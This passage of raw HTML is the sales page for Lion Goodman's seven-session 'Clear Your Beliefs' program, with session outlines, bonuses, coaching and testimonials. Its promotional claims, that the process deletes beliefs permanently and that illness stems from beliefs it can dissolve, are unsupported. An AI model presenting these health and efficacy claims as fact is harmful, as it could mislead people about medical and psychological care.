src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" 